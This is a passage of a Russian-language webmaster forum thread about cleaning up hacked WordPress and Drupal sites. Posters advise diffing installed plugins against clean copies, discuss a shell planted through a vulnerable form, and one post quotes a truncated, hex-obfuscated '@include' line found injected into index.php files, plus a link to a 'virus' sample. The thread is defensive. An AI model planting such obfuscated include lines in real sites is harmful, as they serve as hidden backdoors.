Взлом сайта

123
S
На сайте с 30.09.2016
Offline
469
#11
katenuha:
Есть какие-нибудь конкретные инструкции?

К сожалению, мир вредоносов разнообразен и непредсказуем. Поэтому инструкции общие и известные:

- ищите подозрительные запросы

- ищите подозрительные файлы

- ищите подозрительные инструкции в файлах.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
YDoron
На сайте с 25.10.2005
Offline
156
#12

Я сейчас такой эфективный способ нашёл, который возможно найдёт заражённые файлы:

1) подключаемся к серверу по SSH, открываем консоль

2) для каждого плагина на заражённом сайте, находим его версию, обычно в папке с плагином в файле readme или changelog

3) Открываем в каталоге плагинов вордпресс https://wordpress.org/plugins/ проверяемый плагин

4) Копируем ссылку скачивания версии плагина той версии, которую нашли в пункте №2, её можно найти нажав по кнопке "Advanced View"

5)на сервере, скачиваем эту версию командой wget

6)распаковываем архив этого плагина, и запускаем проверку директорий скаченного плагина, с тем что на заражённом сайте

команда: diff -rq /пусть_к_распакованному_плагину /wp-content/plugins/путь_к_плагину_на_заражённом_сайте

настраиваю Linux сервера, правлю баги, пишу фичи под Wordpress и Laravel
SeVlad
На сайте с 03.11.2008
Offline
1432
#13
katenuha:
Есть какие-нибудь конкретные инструкции?

Ты вообще читаешь что тебе отвечают? Не похоже.

В топик рядом хоть видел?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Топики помощи с ⓌordPress (https://searchengines.guru/ru/forum/1032910 ) и основы безопасности сайтов ( https://searchengines.guru/ru/forum/774117 ). *** Помощь\консультации в топиках форума - БЕСПЛАТНО. Платные услуги ( https://wp.me/P3YHjQ-3 ) - с бюджетом от 150$ ***
vandamme
На сайте с 30.11.2008
Offline
649
#14
SeVlad:
В Друпале за последнее время обнаружено 2 критичных уязвимости.

только что хотел создать тему с таким же вопросом) вчера все обновил, вычистил, сегодня все на месте, но припрятано в другом месте. Внутри папок десятки index.php содержащих такую бяку:

@include "\x2fh\x6fm\x65/\x6fk\x6eo\x73t\x72/\x77w\x77/\x73i\x74e\x32/

логи сервера просмотреть невозможно, внутри почему-то айпи адреса не пользователей, а сервера, в фтп логах не заметил чужака.

дрюпал. самое последнее обновление.

S
На сайте с 09.04.2010
Offline
62
#15
vandamme:
только что хотел создать тему с таким же вопросом) вчера все обновил, вычистил, сегодня все на месте, но припрятано в другом месте.

Вы обновляли удалением всего, что есть, кроме папки sites (в случае Drupal 8 еще папки modules, sites, themes и libraries), и файлов .htaccess и robots.txt, или просто копировали поверх того, что есть, новые core?

SeVlad
На сайте с 03.11.2008
Offline
1432
#16
vandamme:
внутри почему-то айпи адреса не пользователей, а сервера,

Потому что наверняка это ты видишь уже второй этап - работа непосредственно шелла. См. по ссылке на соседний топик.

vandamme
На сайте с 30.11.2008
Offline
649
#17
sletf:
Вы обновляли удалением всего, что есть, кроме папки sites (в случае Drupal 8 еще папки modules, sites, themes и libraries), и файлов .htaccess и robots.txt, или просто копировали поверх того, что есть, новые core?

конечно, все полностью удаляется и заливается заново, с ручным просмотром каждого оставшегося файла (конфиги, тема сайта, корневой хатакес и тд).

SeVlad:
второй этап - работа непосредственно шелла

Предполагаю, лог http запросов пишет хостерский скрипт извне аккаунта. Но хостеру еще до изучения этого топика написал запрос.

SeVlad
На сайте с 03.11.2008
Offline
1432
#18
vandamme:
Предполагаю, лог http запросов пишет хостерский скрипт извне аккаунта

Почитай всё же соседний топик.. Там одна из проблем - через форму можно залезть в базу, поселить шелл. Вот следы его работы ты уже и видишь влогах. #Ятакдумаю.

А вообще обсуждение этих уязвимостей друпала лучше вести в том топике. Всяко полезнее будет.

vandamme
На сайте с 30.11.2008
Offline
649
#19
SeVlad:
Вот следы его работы ты уже и видишь влогах

ты про какие логи говоришь? логи друпала или сервера?

я смотрел, в первую очередь, логи сервера (шаред).

как из базы данных можно в логи сервера подставить ip адрес сервера?

vandamme
На сайте с 30.11.2008
Offline
649
#20

кстати, вирус

http://jsbin.com/cecikejeve/edit?html

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий